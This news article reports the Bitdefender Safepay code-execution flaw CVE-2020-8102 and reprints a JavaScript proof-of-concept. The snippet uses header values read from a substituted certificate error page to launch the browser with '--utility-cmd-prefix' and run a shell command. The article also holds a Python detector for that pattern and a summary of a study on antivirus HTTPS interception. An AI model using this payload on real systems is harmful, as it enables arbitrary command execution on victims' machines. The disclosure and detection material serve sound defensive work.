Code execution vulnerability in Bitdefender SafePay secure browser

Vladimir Palant, creator of Adblock Plus, disclosed a vulnerability (CVE-2020-8102) in Safepay, the specialized Chromium-based web browser shipped with the Bitdefender Total Security 2020 anti-virus suite and intended to improve the user's safety online (for example, by providing additional isolation when accessing banks and payment systems). The vulnerability allows websites opened in the browser to execute arbitrary code at the operating-system level.

The root of the problem is that the Bitdefender anti-virus intercepts HTTPS traffic locally by replacing the site's original TLS certificate. An additional root certificate is installed on the client system, which keeps the traffic inspection invisible to the browser. The anti-virus wedges itself into the secure connection and injects its own JavaScript code into some pages to implement the Safe Search function, and when there is a problem with the connection's certificate it replaces the error page with its own. Because that error page is served on behalf of the server being opened, other pages on the same server have full access to the content inserted by Bitdefender.

When a site controlled by an attacker is opened, that site can send an XMLHttpRequest and feign an HTTPS certificate problem in the response, which causes Bitdefender to return its substituted error page. Since that error page is opened in the context of the attacker's domain, the attacker can read the contents of the page Bitdefender substituted. This page also contains a session key that allows the internal Bitdefender API to be used to launch a separate Safepay browser session with arbitrary command-line flags, and thereby run any system command via the "--utility-cmd-prefix" flag. Example exploit (param1 and param2 are the values obtained from the error page):

// The request goes to the attacker's own origin; the response is the
// certificate error page substituted by Bitdefender
var request = new XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
// param1 and param2 are the values read from the substituted error page
request.setRequestHeader("BDNDSS_B67EA559F21B487F861FDA8A44F01C50", param1);
request.setRequestHeader("BDNDCA_BBACF84D61A04F9AA66019A14B035478", param2);
request.setRequestHeader("BDNDWB_5056E556833D49C1AF4085CB254FC242", "obk.run");
request.setRequestHeader("BDNDOK_4E961A95B7B44CBCA1907D3D3643370D", location.href);
request.send("data:text/html,nada --utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
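As an added defensive example (not code from the article or from Bitdefender), the following script flags the process-creation pattern this exploit produces: a Chromium-based browser started with the "--utility-cmd-prefix" switch, or a command shell whose parent is the browser. It assumes Sysmon-style process-creation events with image, parent image and command line, and the image name safepay.exe is a hypothetical placeholder for the Safepay binary.

```python
import re

# Assumed image names; "safepay.exe" is a placeholder, not a verified binary name
BROWSER_IMAGES = ("safepay.exe", "chrome.exe", "msedge.exe")
SHELL_IMAGES = ("cmd.exe", "powershell.exe")
# Chromium prefixes every utility-process launch with this switch's value,
# so a browser started with it should never appear in normal telemetry.
DANGEROUS_SWITCH = re.compile(r"--utility-cmd-prefix(=|\s)", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze_event(event):
    """Return alert strings for one process-creation event (empty if benign)."""
    alerts = []
    image = basename(event["image"])
    parent = basename(event["parent_image"])
    if image in BROWSER_IMAGES and DANGEROUS_SWITCH.search(event["command_line"]):
        alerts.append(f"{image} launched with --utility-cmd-prefix")
    if image in SHELL_IMAGES and parent in BROWSER_IMAGES:
        alerts.append(f"{parent} spawned shell {image}")
    return alerts


def scan(events):
    """Run analyze_event over a batch; returns (pid, alert) pairs."""
    return [(e["pid"], a) for e in events for a in analyze_event(e)]


# Constructed sample events, not real telemetry
SAMPLE_EVENTS = [
    {"pid": 1000, "image": r"C:\Program Files\Bitdefender\Safepay\safepay.exe",
     "parent_image": r"C:\Program Files\Bitdefender\bdagent.exe",
     "command_line": r'safepay.exe --utility-cmd-prefix="cmd.exe /k whoami & echo" data:text/html,nada'},
    {"pid": 1001, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Program Files\Bitdefender\Safepay\safepay.exe",
     "command_line": r"cmd.exe /k whoami & echo"},
    {"pid": 1002, "image": r"C:\Program Files\Bitdefender\Safepay\safepay.exe",
     "parent_image": r"C:\Program Files\Bitdefender\bdagent.exe",
     "command_line": r"safepay.exe https://bank.example"},
]

if __name__ == "__main__":
    for pid, alert in scan(SAMPLE_EVENTS):
        print(pid, alert)
```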


Note that a 2017 study showed that 24 of the 26 antivirus products tested that inspect HTTPS traffic by substituting certificates lowered the overall security level of the HTTPS connection.
Only 11 of the 26 products offered up-to-date cipher suites. Five did not perform certificate verification at all (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). The Kaspersky Internet Security and Total Security products were susceptible to the CRIME attack, and the AVG, Bitdefender and Bullguard products to the Logjam and POODLE attacks. Dr.Web Antivirus 11 allowed a downgrade to weak export ciphers (the FREAK attack).

Source: opennet.ru
